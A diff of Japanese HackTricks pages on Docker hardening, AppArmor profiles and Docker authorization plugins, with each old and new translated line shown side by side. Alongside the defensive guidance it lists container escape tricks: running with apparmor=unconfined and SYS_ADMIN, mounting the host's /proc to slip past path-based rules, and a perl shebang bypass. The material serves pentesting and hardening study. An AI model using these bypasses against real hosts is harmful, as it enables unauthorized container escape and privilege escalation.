* コンテナ内で**rootとして実行しないでください。**[**異なるユーザー**](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/#user) **と**[**ユーザーネームスペース**](https://docs.docker.com/engine/security/userns-remap/) **を使用してください。** コンテナ内のrootは、ユーザーネームスペースでリマップされていない限り、ホストと同じです。主にLinuxのネームスペース、機能、およびcgroupsによってわずかに制限されています。
* [**すべての機能を削除**](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) **(`--cap-drop=all`)し、必要な機能のみを有効にしてください**`--cap-add=...`)。多くのワークロードには機能が必要ない場合があり、それらを追加すると攻撃の範囲が広がります。
* プロセスがsuidバイナリを介して特権を取得するのを防ぐために、**“no-new-privileges”セキュリティオプションを使用してください**。
* コンテナに利用可能なリソースを**制限してください**。リソース制限は、マシンをサービス拒否攻撃から保護できます。
* **[seccomp](https://docs.docker.com/engine/security/seccomp/)**、**[AppArmor](https://docs.docker.com/engine/security/apparmor/)** **またはSELinux**プロファイルを調整して、コンテナで利用可能なアクションとシスコールを最小限に制限してください。
* **[公式のDockerイメージ](https://docs.docker.com/docker-hub/official_images/)**を使用し、署名を要求するか、それらを基に独自のイメージを構築してください。[バックドアが仕込まれた](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/)イメージを継承したり使用しないでください。また、ルートキー、パスフレーズは安全な場所に保存してください。DockerはUCPでキーを管理する計画を立てています。
* **定期的に**イメージを**再構築**して、ホストとイメージにセキュリティパッチを適用してください。
* **シークレットを賢く管理**して、攻撃者がアクセスしにくくしてください。
* Dockerデーモンを公開する場合は、HTTPSを使用してクライアントとサーバーの認証を行ってください。
* Dockerfileでは、**ADDの代わりにCOPYを使用**してください。ADDは自動的にzipファイルを解凍し、URLからファイルをコピーできます。COPYにはこれらの機能がありません。可能な限りADDを使用せず、リモートURLやZipファイルを介した攻撃に対して脆弱にならないようにしてください。
* 各マイクロサービスに**別々のコンテナを使用**してください。
* コンテナ**イメージを小さくしてください**
## Docker Breakout / Privilege Escalation
## Docker Breakout / 特権昇格
**dockerコンテナ内にいる場合**、または **dockerグループのユーザーにアクセスできる場合**、**脱出して権限を昇格する** ことを試みることができます:
もし**Dockerコンテナ内にいる**か、**dockerグループのユーザーにアクセス権がある**場合、**脱出して特権を昇格**することができます:
{% content-ref url="docker-breakout-privilege-escalation/" %}
[docker-breakout-privilege-escalation](docker-breakout-privilege-escalation/)
{% endcontent-ref %}
## Docker Authentication Plugin Bypass
## Docker認証プラグインのバイパス
dockerソケットにアクセスできる場合、または **dockerグループのユーザーにアクセスできるが、docker認証プラグインによって行動が制限されている場合**、それを **バイパスできるかどうかを確認してください**
Dockerソケットにアクセス権があるか、**dockerグループのユーザーにアクセス権があるが、Docker認証プラグインによって制限されている**場合、**バイパスできるかどうかを確認してください**
{% content-ref url="authz-and-authn-docker-access-authorization-plugin.md" %}
[authz-and-authn-docker-access-authorization-plugin.md](authz-and-authn-docker-access-authorization-plugin.md)
{% endcontent-ref %}
## Dockerの強化
## Dockerのハードニング
* ツール [**docker-bench-security**](https://github.com/docker/docker-bench-security) は、本番環境でDockerコンテナをデプロイする際の一般的なベストプラクティスを数十項目チェックするスクリプトです。テストはすべて自動化されており、[CIS Docker Benchmark v1.3.1](https://www.cisecurity.org/benchmark/docker/) に基づいています。\
ツールを実行するには、dockerを実行しているホストから、または十分な権限を持つコンテナから実行する必要があります。**READMEでの実行方法を確認してください** [**https://github.com/docker/docker-bench-security**](https://github.com/docker/docker-bench-security)。
* ツール[**docker-bench-security**](https://github.com/docker/docker-bench-security)は、本番環境でDockerコンテナを展開する際の数十の一般的なベストプラクティスをチェックするスクリプトです。これらのテストはすべて自動化されており、[CIS Docker Benchmark v1.3.1](https://www.cisecurity.org/benchmark/docker/)に基づいています。\
このツールを実行するには、Dockerを実行しているホストからまたは十分な権限を持つコンテナから実行する必要があります。READMEでの実行方法については、[**https://github.com/docker/docker-bench-security**](https://github.com/docker/docker-bench-security)を参照してください
## 参考文献
@ -421,25 +397,29 @@ dockerソケットにアクセスできる場合、または **dockerグルー
* [https://sreeninet.wordpress.com/2016/03/06/docker-security-part-4container-image/](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-4container-image/)
* [https://en.wikipedia.org/wiki/Linux\_namespaces](https://en.wikipedia.org/wiki/Linux\_namespaces)
* [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57)
* [https://www.redhat.com/sysadmin/privileged-flag-container-engines](https://www.redhat.com/sysadmin/privileged-flag-container-engines)
* [https://docs.docker.com/engine/extend/plugins_authorization](https://docs.docker.com/engine/extend/plugins_authorization)
* [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57)
* [https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/](https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/)
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) を使用して、世界で **最も先進的な** コミュニティツールによって動力を供給される **ワークフローを簡単に構築および自動化します**。\
今すぐアクセス:
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによって強化された**ワークフローを簡単に構築**および**自動化**してください。\
今すぐアクセスしてください
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) で</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>AWSハッキングをゼロからヒーローまで学びましょう</strong></a><strong></strong></summary>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**で**ゼロからヒーローまでのAWSハッキング**を学びましょう</strong></summary>
HackTricksをサポートする他の方法
* **HackTricksに広告を掲載したい場合**、または **HackTricksをPDFでダウンロードしたい場合**、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com) を入手してください。
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見してください。私たちの独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) コレクションです。
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) または [**telegramグループ**](https://t.me/peass) **参加するか**、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **フォローしてください**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) および [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) githubリポジトリにPRを提出して、あなたのハッキングのコツを共有してください。
* **HackTricksで会社を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksのスウォッグ**](https://peass.creator-spring.com)を手に入れましょう
* 独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションである[**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**してください。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、自分のハッキングトリックを共有してください。
</details>

162
linux-hardening/privilege-escalation/docker-security/apparmor.md
View file

@ -2,44 +2,40 @@
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください</strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手す
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**してください。
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングテクニックを共有してください。
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**参加するか、[telegramグループ](https://t.me/peass) に参加するか、**Twitter** 🐦 で私をフォローする [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **ハッキングトリックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出する
</details>
## 基本情報
**AppArmor**は、**プログラム**を**限定された**一連の**リソース**に制限するカーネル拡張機能であり、**プログラムごとのプロファイル**を使用します。プロファイルは、ネットワークアクセス、生のソケットアクセス、および一致するパス上のファイルの読み取り、書き込み、または実行の許可などの**機能**を**許可**することができます。
AppArmor は、**プログラムごとのプロファイルを介してプログラムが利用できるリソースを制限するように設計されたカーネルの拡張機能**であり、アクセス制御属性をユーザーではなくプログラムに直接結びつけることで、強制アクセス制御MACを効果的に実装します。このシステムは、**プロファイルをカーネルにロード**して動作し、これらのプロファイルは、ネットワーク接続、RAWソケットアクセス、ファイルアクセスなど、プログラムがアクセスできるリソースを指示します。
これは、**アクセス制御**属性をユーザーではなく**プログラムに結び付ける**強制アクセス制御または**MAC**です。\
AppArmorの制限は、通常はブート時にカーネルにロードされる**プロファイル**を介して提供されます。\
AppArmorプロファイルは**2つのモード**のいずれかになります:
AppArmor プロファイルには、次の2つの動作モードがあります:
* **Enforcement強制**: 強制モードでロードされたプロファイルは、プロファイルに定義されたポリシーの**強制**およびポリシー違反試行の**報告**syslogまたはauditd経由をもたらします。
* **Complain苦情**: 苦情モードのプロファイルはポリシーを強制しませんが、代わりにポリシー**違反**試行を**報告**します
- **強制モード**: このモードは、プロファイルで定義されたポリシーを積極的に強制し、これらのポリシーに違反するアクションをブロックし、syslog や auditd などのシステムを介してこれらを侵害しようとする試みを記録します。
- **クレームモード**: 強制モードとは異なり、クレームモードはプロファイルのポリシーに違反するアクションをブロックしません。代わりに、これらの試みをポリシー違反として記録し、制限を強制しません
AppArmorは、他のいくつかのLinux上のMACシステムとは異なりますそれは**パスベース**であり、強制と苦情モードのプロファイルを混在させることができ、開発を容易にするためのインクルードファイルを使用し、他の人気のあるMACシステムよりもはるかに低い参入障壁を持っています。
### AppArmor の構成要素
### AppArmorの構成要素
* **カーネルモジュール**: 実際の作業を行います
* **ポリシー**: 振る舞いと制限を定義します
* **パーサー**: カーネルにポリシーをロードします
* **ユーティリティ**: apparmorと対話するユーザーモードプログラム
- **カーネルモジュール**: ポリシーの強制を担当します。
- **ポリシー**: プログラムの動作とリソースアクセスのルールと制限を指定します。
- **パーサー**: ポリシーをカーネルにロードして強制または報告します。
- **ユーティリティ**: AppArmor とのやり取りと管理のためのインターフェースを提供するユーザーモードプログラムです。
### プロファイルのパス
Apparmorプロファイルは通常、_**/etc/apparmor.d/**_に保存されます。\
`sudo aa-status`を使用すると、プロファイルによって制限されているバイナリをリストすることができます。リストされた各バイナリのパスの文字"/"をドットに変更すると、言及されたフォルダ内のapparmorプロファイルの名前が得られます。
AppArmor プロファイルは通常、_**/etc/apparmor.d/**_ に保存されます。\
`sudo aa-status` を使用すると、いくつかのプロファイルに制限がかけられているバイナリをリストアップできます。リストされた各バイナリのパスのスラッシュ "/" をドットに変更すると、言及されたフォルダ内の apparmor プロファイルの名前が取得できます。
例えば、_/usr/bin/man_の**apparmor**プロファイルは_/etc/apparmor.d/usr.bin.man_に位置しています。
たとえば、_**/usr/bin/man**_ 用の **apparmor** プロファイルは _**/etc/apparmor.d/usr.bin.man**_ にあります。
### コマンド
```bash
@ -53,40 +49,34 @@ aa-mergeprof #used to merge the policies
```
## プロファイルの作成
* 実行可能ファイルを指定するために、**絶対パスとワイルドカード**が許可されています(ファイルのグロビングを指定するため)。
* バイナリが**ファイル**に対して持つアクセスを示すために、以下の**アクセスコントロール**が使用できます:
* 影響を受ける実行可能ファイルを示すために、**絶対パスとワイルドカード**が許可されています(ファイルグロブを使用するため)。
* **ファイル**に対するバイナリのアクセスを示すために、以下の**アクセス制御**が使用できます:
* **r**(読み取り)
* **w**(書き込み)
* **m**(実行可能としてメモリマップ)
* **k**(ファイルロック)
* **l**(ハードリンクの作成)
* **ix**(別のプログラムを実行し、新しいプログラムがポリシーを継承する
* **Px**(環境をクリーニングした後、別のプロファイルで実行)
* **Cx**(環境をクリーニングした後、子プロファイルで実行)
* **Ux**(環境をクリーニングした後、制限なしで実行)
* **変数**はプロファイル内で定義でき、プロファイルの外から操作できます。例:@{PROC} と @{HOME}(プロファイルファイルに #include \<tunables/global> を追加)
* **許可ルールを上書きする拒否ルールがサポートされています**。
* **ix**新しいプログラムで別のプログラムを実行し、ポリシーを継承)
* **Px**(環境をクリーンアップした後、別のプロファイルで実行)
* **Cx**(環境をクリーンアップした後、子プロファイルで実行)
* **Ux**(環境をクリーンアップした後、無制限に実行)
* **変数**はプロファイルで定義でき、プロファイルの外部から操作できます。例:@{PROC} および @{HOME}(プロファイルファイルに #include \<tunables/global> を追加)
* **許可ルールを上書きするために拒否ルールがサポートされています**。
### aa-genprof
簡単にプロファイル作成を始めるために、apparmorが助けになります。**apparmorがバイナリによって実行されたアクションを検査し、どのアクションを許可または拒否するかを決定することを可能にします**。\
実行するだけです:
簡単にプロファイルの作成を開始するために、apparmor が役立ちます。**バイナリによって実行されるアクションを apparmor に検査させ、その後、許可または拒否するアクションを決定できます**。\
次のコマンドを実行するだけです:
```bash
sudo aa-genprof /path/to/binary
```
次に、別のコンソールでバイナリが通常実行するすべてのアクションを実行します:
その後、別のコンソールで通常バイナリが実行するすべてのアクションを実行します:
```bash
/path/to/binary -a dosomething
```
最初のコンソールで「**s**」を押し、記録されたアクションで無視するか、許可するか、その他の操作を指示します。終了したら「**f**」を押すと、新しいプロファイルが _/etc/apparmor.d/path.to.binary_ に作成されます。
{% hint style="info" %}
矢印キーを使用して、許可/拒否/その他の操作を選択できます。
{% endhint %}
### aa-easyprof
バイナリのapparmorプロファイルのテンプレートも以下のように作成できます
また、バイナリのAppArmorプロファイルのテンプレートを作成することもできます。
```bash
sudo aa-easyprof /path/to/binary
# vim:syntax=apparmor
@ -112,21 +102,21 @@ sudo aa-easyprof /path/to/binary
}
```
{% hint style="info" %}
デフォルトでは作成されたプロファイルでは何も許可されていないため、全てが拒否されます。たとえば、バイナリが`/etc/passwd`を読み取ることを許可するには、`/etc/passwd r,`のような行を追加する必要があります。
デフォルトでは、作成したプロファイルでは何も許可されていないため、すべてが拒否されます。たとえば、バイナリが `/etc/passwd` を読むことを許可するために `/etc/passwd r,` のような行を追加する必要があります。
{% endhint %}
その後、新しいプロファイルを**強制**することができます。
新しいプロファイルを**強制**することができます。
```bash
sudo apparmor_parser -a /etc/apparmor.d/path.to.binary
```
### ログからプロファイルを変更する
### ログからプロファイルを修正する
次のツールはログを読み取り、検出された禁止されているアクションを許可するかどうかユーザーに尋ねます:
次のツールはログを読み取り、ユーザーに検出された禁止されたアクションの許可を求めます:
```bash
sudo aa-logprof
```
{% hint style="info" %}
矢印キーを使用して、許可/拒否/その他を選択できます
矢印キーを使用して、許可/拒否/その他の選択を行うことができます
{% endhint %}
### プロファイルの管理
@ -144,9 +134,7 @@ apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile
type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000
type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
```
```markdown
情報は以下の使用でも取得できます:
```
以下の情報を使用して取得することもできます:
```bash
sudo aa-notify -s 1 -v
Profile: /bin/service_bin
@ -164,9 +152,9 @@ Logfile: /var/log/audit/audit.log
AppArmor denials: 2 (since Wed Jan 6 23:51:08 2021)
For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor
```
## DockerにおけるApparmor
## Docker内のApparmor
デフォルトで**docker-profile**がどのようにDockerによってロードされるかに注目してください:
デフォルトでDockerのプロファイル**docker-profile**がロードされていることに注意してください:
```bash
sudo aa-status
apparmor module is loaded.
@ -182,87 +170,85 @@ apparmor module is loaded.
/usr/lib/connman/scripts/dhclient-script
docker-default
```
デフォルトでは、**Apparmor docker-default プロファイル**は[https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor)から生成されます。
デフォルトでは、**Apparmor docker-defaultプロファイル**は[https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor)から生成されます。
**docker-default プロファイルの概要**
**docker-defaultプロファイルの概要**:
* すべての**ネットワーキング**への**アクセス**
* **権限**は定義されていません(ただし、基本的な基本ルールを含むことにより、いくつかの権限が付与されます。例:#include \<abstractions/base>
* 任意の**/proc**ファイルへの**書き込み**は**許可されていません**
* /**proc** および /**sys** の他の**サブディレクトリ**/**ファイル**は、読み取り/書き込み/ロック/リンク/実行アクセスが**拒否**されます
* **マウント**は**許可されていません**
* **Ptrace**は、**同じapparmorプロファイル**によって制限されているプロセスでのみ実行できます
- すべての**ネットワーキング**への**アクセス**
- **権限**は定義されていません(ただし、一部の権限は基本的なベースルールを含めることで得られます、つまり#include \<abstractions/base>
- 任意の**/proc**ファイルへの**書き込み**は**許可されていません**
- 他の/**proc**および/**sys**の**サブディレクトリ**/**ファイル**への読み取り/書き込み/ロック/リンク/実行アクセスは**拒否されます**
- **マウント**は**許可されていません**
- **Ptrace**は、**同じapparmorプロファイル**によって制限されたプロセスでのみ実行できます
**dockerコンテナを実行**すると、次の出力が表示されるはずです:
Dockerコンテナを**実行**すると、次の出力が表示されるはずです:
```bash
1 processes are in enforce mode.
docker-default (825)
```
注意: **apparmorは、デフォルトでコンテナに付与された機能権限もブロックします**。例えば、**SYS\_ADMIN機能が付与されていても、/proc内への書き込み権限をブロックすることができます**。なぜなら、デフォルトのdocker apparmorプロファイルはこのアクセスを拒否するからです:
注意してください。デフォルトでは、**apparmor はさえコンテナに付与された権限をブロック**します。たとえば、**SYS\_ADMIN 権限が付与されている場合でも、/proc への書き込み権限をブロック**することができます。なぜなら、デフォルトでは Docker の apparmor プロファイルがこのアクセスを拒否するからです。
```bash
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash
echo "" > /proc/stat
sh: 1: cannot create /proc/stat: Permission denied
```
**AppArmorを無効にする**必要があります。それによって制限を回避できます:
必要に応じて、AppArmorを**無効に**して、その制限をバイパスします。
```bash
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash
```
デフォルトでは、**AppArmor** は **SYS\_ADMIN** 権限があっても、コンテナが内部からフォルダをマウントすることを**禁止**します。
デフォルトでは**AppArmor**は、SYS\_ADMIN機能を持っていても、コンテナが内部からフォルダをマウントすることを**禁止します**
Docker コンテナに **capabilities****追加/削除** することができます(これは **AppArmor****Seccomp** などの保護方法によって依然として制限されます):
dockerコンテナに**capabilities**を**追加/削除**できることに注意してください(これは**AppArmor**や**Seccomp**などの保護方法によって引き続き制限されます):
* `--cap-add=SYS_ADMIN``SYS_ADMIN` 権限を与えます
* `--cap-add=ALL` はすべての権限を与えます
* `--cap-drop=ALL --cap-add=SYS_PTRACE` はすべての権限を削除し、`SYS_PTRACE` のみを与えます
- `--cap-add=SYS_ADMIN` は`SYS_ADMIN`機能を付与します
- `--cap-add=ALL` はすべての機能を付与します
- `--cap-drop=ALL --cap-add=SYS_PTRACE` はすべての機能を削除し、`SYS_PTRACE`のみを付与します
{% hint style="info" %}
通常、Docker コンテナ**内部**で**特権権限**が利用可能であることが**分かった**場合でも、**エクスプロイトの一部が機能しない**ことがあります。これは、Docker **AppArmor がそれを防いでいる**可能性が高いです。
通常、**docker**コンテナ内で**特権機能**が**利用可能**であることがわかった場合でも、**exploitの一部が機能しない**場合は、docker **apparmorがそれを防いでいる**可能性があります。
{% endhint %}
### 例
[**こちら**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/)からの例
[**こちら**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/)の例から)
AppArmor の機能を示すために、「mydocker」という新しい Docker プロファイルを作成し、以下の行を追加しました:
AppArmorの機能を説明するために、次の行が追加された新しいDockerプロファイル「mydocker」を作成しました:
```
deny /etc/* w, # deny write for all files directly in /etc (not in a subdir)
```
プロファイルを有効にするには、次の操作を行う必要があります:
プロファイルをアクティブにするには、以下の手順を実行する必要があります:
```
sudo apparmor_parser -r -W mydocker
```
プロファイルを一覧表示するには、以下のコマンドを実行します。以下のコマンドは、私の新しいAppArmorプロファイルをリストしています。
プロファイルをリストするには、以下のコマンドを使用できます。以下のコマンドは、私の新しいAppArmorプロファイルをリストしています。
```
$ sudo apparmor_status | grep mydocker
mydocker
```
以下に示すように、「/etc/」を変更しようとすると、AppArmorプロファイルが「/etc」への書き込みアクセスを防いでいるため、エラーが発生します。
以下ように、「/etc/」を変更しようとするとエラーが発生します。これは、AppArmorプロファイルが「/etc/」への書き込みアクセスを防いでいるためす。
```
$ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost busybox chmod 400 /etc/hostname
chmod: /etc/hostname: Permission denied
```
### AppArmor Docker Bypass1
コンテナが実行している**apparmorプロファイル**を見つける方法は以下の通りです:
コンテナで実行されている**apparmorプロファイルを見つける**には、次のコマンドを使用できます:
```bash
docker inspect 9d622d73a614 | grep lowpriv
"AppArmorProfile": "lowpriv",
"apparmor=lowpriv"
```
その後、以下の行を実行して**使用されている正確なプロファイルを見つけます**
その後、次の行を実行して、**使用されている正確なプロファイルを見つける**ことができます:
```bash
find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null
```
奇妙なケースでは、**AppArmorのDockerプロファイルを変更して再読み込みすることができます。** 制限を取り除き、それらを「バイパス」することができます。
### AppArmor Docker Bypass2
### AppArmor Docker バイパス2
**AppArmorはパスベース**であり、これは、たとえ**`/proc`**のようなディレクトリ内のファイルを**保護**していても、コンテナの実行方法を**構成**できる場合、ホストのprocディレクトリを**`/host/proc`**にマウントすることができ、それによりAppArmorによる保護が**解除**されます。
**AppArmorはパスベースです**。これは、**`/proc`** のようなディレクトリ内のファイルを**保護**しているかもしれませんが、コンテナの実行方法を**設定**できる場合、ホストのprocディレクトリを **`/host/proc`** に**マウント**すると、それはもはやAppArmorによって**保護されなくなります**。
### AppArmor Shebang Bypass
### AppArmor Shebang バイパス
[**このバグ**](https://bugs.launchpad.net/apparmor/+bug/1911431)では、**特定のリソースでperlを実行することを防いでいる場合でも**、最初の行に**`#!/usr/bin/perl`** を**指定**したシェルスクリプトを作成し、ファイルを**直接実行**すると、何でも実行できる例が見られます。例:
[**このバグ**](https://bugs.launchpad.net/apparmor/+bug/1911431)では、**特定のリソースでperlの実行を防いでいる場合でも**、最初の行に**`#!/usr/bin/perl`**を指定したシェルスクリプトを作成し、ファイルを直接**実行**すると、任意のコマンドを実行できることが示されています。例:
```perl
echo '#!/usr/bin/perl
use POSIX qw(strftime);
@ -274,14 +260,14 @@ chmod +x /tmp/test.pl
```
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks) および [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) githubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
* **HackTricks で企業を宣伝したい**または**HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**する
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
</details>

127
linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md
View file

@ -1,81 +1,83 @@
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
- **ハッキングトリックを共有するために、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>
**Docker**の標準の**認可**モデルは**全てか無か**です。Dockerデーモンへのアクセス権を持つユーザーは、**任意の**Dockerクライアント**コマンド**を**実行**できます。DockerのEngine APIを使用してデーモンに連絡する呼び出し元にも同じことが当てはまります。**より高度なアクセス制御**が必要な場合は、**認可プラグイン**を作成し、Dockerデーモンの設定に追加することができます。認可プラグインを使用すると、Docker管理者はDockerデーモンへのアクセスを管理するための**詳細なアクセスポリシー**を設定できます。
